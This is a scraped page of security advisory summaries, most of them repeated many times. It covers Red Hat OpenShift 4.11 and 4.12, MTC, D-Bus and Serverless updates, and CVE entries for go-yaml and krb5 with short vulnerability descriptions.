RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7399: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-2879: golang: arc...

RHSA-2022:7401: Red Hat Security Advisory: OpenShift Container Platform 4.12 security update

Red Hat OpenShift Container Platform release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server

RHSA-2022:7401: Red Hat Security Advisory: OpenShift Container Platform 4.12 security update

Red Hat OpenShift Container Platform release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server

RHSA-2022:7398: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 packages and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: go-yaml: Denial of Service in go-yaml * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-2995: cri-o: incorrect handlin...

RHSA-2022:7398: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 packages and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: go-yaml: Denial of Service in go-yaml * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-2995: cri-o: incorrect handlin...

RHSA-2022:7398: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 packages and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: go-yaml: Denial of Service in go-yaml * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-2995: cri-o: incorrect handlin...

RHSA-2022:7398: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 packages and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: go-yaml: Denial of Service in go-yaml * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-2995: cri-o: incorrect handlin...

RHSA-2022:7398: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 packages and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: go-yaml: Denial of Service in go-yaml * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-2995: cri-o: incorrect handlin...

RHSA-2022:7398: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 packages and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: go-yaml: Denial of Service in go-yaml * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-2995: cri-o: incorrect handlin...

RHSA-2022:7398: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 packages and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: go-yaml: Denial of Service in go-yaml * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-2995: cri-o: incorrect handlin...

RHSA-2022:7398: Red Hat Security Advisory: OpenShift Container Platform 4.12.0 packages and security update

Red Hat OpenShift Container Platform release 4.12.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: go-yaml: Denial of Service in go-yaml * CVE-2022-2880: golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters * CVE-2022-2995: cri-o: incorrect handlin...

Red Hat Security Advisory 2023-0096-01

Red Hat Security Advisory 2023-0096-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

Red Hat Security Advisory 2023-0096-01

Red Hat Security Advisory 2023-0096-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

Red Hat Security Advisory 2023-0096-01

Red Hat Security Advisory 2023-0096-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

GHSA-r88r-gmrh-7j83: YAML Go package vulnerable to denial of service

Due to unbounded alias chasing, a maliciously crafted YAML file can cause the system to consume significant system resources. If parsing user input, this may be used as a denial of service vector.

CVE-2021-4235: Add logic to catch cases of alias abuse. · go-yaml/yaml@bb4e33b

Due to unbounded alias chasing, a maliciously crafted YAML file can cause the system to consume significant system resources. If parsing user input, this may be used as a denial of service vector.

CVE-2022-42898: Fix integer overflows in PAC parsing · krb5/krb5@ea92d2f

PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."

Red Hat Security Advisory 2022-8893-01

Red Hat Security Advisory 2022-8893-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.20.

Red Hat Security Advisory 2022-8893-01

Red Hat Security Advisory 2022-8893-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.20.

Red Hat Security Advisory 2022-8893-01

Red Hat Security Advisory 2022-8893-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.20.

Red Hat Security Advisory 2022-8893-01

Red Hat Security Advisory 2022-8893-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.20.

Red Hat Security Advisory 2022-8893-01

Red Hat Security Advisory 2022-8893-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.20.

Red Hat Security Advisory 2022-8893-01

Red Hat Security Advisory 2022-8893-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.20.

RHSA-2022:8893: Red Hat Security Advisory: OpenShift Container Platform 4.11.20 security update

Red Hat OpenShift Container Platform release 4.11.20 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server

RHSA-2022:8893: Red Hat Security Advisory: OpenShift Container Platform 4.11.20 security update

Red Hat OpenShift Container Platform release 4.11.20 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server

RHSA-2022:8893: Red Hat Security Advisory: OpenShift Container Platform 4.11.20 security update

Red Hat OpenShift Container Platform release 4.11.20 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server

RHSA-2022:8893: Red Hat Security Advisory: OpenShift Container Platform 4.11.20 security update

Red Hat OpenShift Container Platform release 4.11.20 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server

RHSA-2022:8893: Red Hat Security Advisory: OpenShift Container Platform 4.11.20 security update

Red Hat OpenShift Container Platform release 4.11.20 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server

RHSA-2022:8893: Red Hat Security Advisory: OpenShift Container Platform 4.11.20 security update

Red Hat OpenShift Container Platform release 4.11.20 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27191: golang: crash in a golang.org/x/crypto/ssh server

RHSA-2022:9047: Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.6 security and bug fix update

The Migration Toolkit for Containers (MTC) 1.7.6 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-28131: golang: encoding/xml: stack exhaustion in Decoder.Skip * CVE-2022-30629: golang: crypto/tls: session tickets lack random ticket_age_add * CVE-2022-30630: golang: io/fs: stack exhaustion in G...

RHSA-2022:9047: Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.6 security and bug fix update

The Migration Toolkit for Containers (MTC) 1.7.6 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-28131: golang: encoding/xml: stack exhaustion in Decoder.Skip * CVE-2022-30629: golang: crypto/tls: session tickets lack random ticket_age_add * CVE-2022-30630: golang: io/fs: stack exhaustion in G...

Red Hat Security Advisory 2022-8977-01

Red Hat Security Advisory 2022-8977-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

Red Hat Security Advisory 2022-8977-01

Red Hat Security Advisory 2022-8977-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

Red Hat Security Advisory 2022-8977-01

Red Hat Security Advisory 2022-8977-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

Red Hat Security Advisory 2022-8938-01

Red Hat Security Advisory 2022-8938-01 - Version 1.26.0 of the OpenShift Serverless Operator is supported on Red Hat OpenShift Container Platform versions 4.8, 4.9, 4.10, and 4.11. This release includes security and bug fixes, and enhancements.

RHSA-2022:8977: Red Hat Security Advisory: dbus security update

